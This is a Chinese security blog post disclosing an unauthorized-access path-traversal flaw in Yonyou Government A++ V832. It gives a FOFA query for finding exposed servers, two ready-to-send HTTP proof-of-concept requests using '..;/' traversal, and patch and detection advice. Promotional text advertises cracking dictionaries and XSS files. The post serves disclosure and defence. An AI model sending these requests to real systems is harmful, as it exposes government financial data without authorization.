漏洞情报-用友政务A++V832产品未授权访问漏洞

admin

103415
文章

87
评论

2024年2月19日11:45:10评论123 views字数 2084阅读6分56秒阅读模式

用友政务A++V832产品未授权访问漏洞

前言：本文中涉及到的相关技术或工具仅限技术研究与讨论，严禁用于非法用途，否则产生的一切后果自行承担，如有侵权请联系。

由于微信公众号推送机制改变了，快来星标不再迷路，谢谢大家！

漏洞详情：

用友政务A++综合计划财务产品，以平台化应⽤、智能化管控、专业化服务为技术、服务理念，以独创的面向岗位角色产品定义思想，综合利用JAVA、智能表单、工作流及最新的互联网、云计算、移动应用等先进技术；融合部门综合计划财务管理领域内的预算编报与分配、预算执行控制、资金计划审批、财务报销、合同支付、集中核算、汇总报表、财务监督、领导查询决策，以及财务服务、移动审批等应⽤共同构成了A++平台软件产品。

原理分析:

由于安全控制不严格，攻击者可以通过目录穿越的方式未授权访问接口。

影响范围:

用友政务A++V832产品

资产测绘

FOFA：body="/pf/portal/login/css/fonts/style.css"

漏洞利用

路径为 /pub/fe/config/..;/..;/..;/ma/asval/getAll 和

/pub/fe/config/..;/..;/..;/ga/riskClassify/getClassifyTree

0X01:

pocGET /pub/fe/config/..;/..;/..;/ma/asval/getAll HTTP/1.1Host: Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, brAccept-Language: zh-CN,zh;q=0.9Connection: close

0X02:

GET /pub/fe/config/..;/..;/..;/ga/riskClassify/getClassifyTree HTTP/1.1Host: Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, brAccept-Language: zh-CN,zh;q=0.9Connection: close

漏洞修复建议

1、升级系统到最新版本

https://security.yonyou.com/#patchInfoidentifier=c55fc3eaf975450190788e13a8cd7f7f

2、检测数据包中可能包含明显的目录穿越痕迹，如使用..;/等路径。

关于我们:

感谢各位大佬们关注-不秃头的安全，后续会坚持更新渗透漏洞思路分享、安全测试、好用工具分享以及挖挖掘SRC思路等文章，同时会组织不定期抽奖，希望能得到各位的关注与支持。

关注福利：

回复“google工具" 获取 google语法生成工具

回复“burp插件" 获取 bp常用插件打包。

回复“暴力破解字典" 获取各种常用密码字典打包

回复“XSS利用文件" 获取现成XSS利用文件.pdf

回复“蓝队工具箱”即可获取一款专业级应急响应的集成多种工具的工具集

知识星球

星球里有什么？

web思路及SRC赏金，攻防演练资源分享(免杀，溯源，钓鱼等)，各种新鲜好用工具，poc定期更新

提前续费有优惠，好用不贵很实惠

交流群

关注公众号回复“加群”，QQ群可直接扫码添加

安全考证

需要考以下各类安全证书的可以联系我，价格优惠、组团更便宜，CISP、PTE、PTS、DSG、IRE、IRS、NISP、PMP、CCSK、CISSP......

往期推荐

CNVD通用型漏洞挖掘-app逻辑缺陷的两个挖掘案例

实战案例：记一次利用SpringBoot相关RCE漏洞拿下某数字化平台系统

黑客如何玩幻兽帕鲁？？？？快来学习

蓝队应急响应工具箱v2024.1

球分享

球点赞

球在看

原文始发于微信公众号（不秃头的安全）：漏洞情报-用友政务A++V832产品未授权访问漏洞

左青龙
微信扫一扫

右白虎
微信扫一扫

漏洞情报-用友政务A++V832产品未授权访问漏洞

【漏洞通告】BIG-IP Next Central Manager多个注入漏洞安全风险通告

用友U8 CRM客户关系管理系统 downloadfile 任意文件读取

用友-U8C-Cloud upload sql注入漏洞复现

漏洞预警 | Travelpayouts开放式重定向漏洞

漏洞复现-福建科立讯通信指挥调度管理平台ajax_users.php 存在SQL注入

漏洞复现-禅道身份认证绕过漏洞

用友U8-CRM客户关系管理系统downloadfile.php 任意文件读取漏洞

【0day】瑞友天翼应用虚拟化系统

QVD-2024-15263：禅道身份认证绕过漏洞

红海云ehr-RedseaPlatform-文件上传-PtFjk

发表评论

在线咨询

微信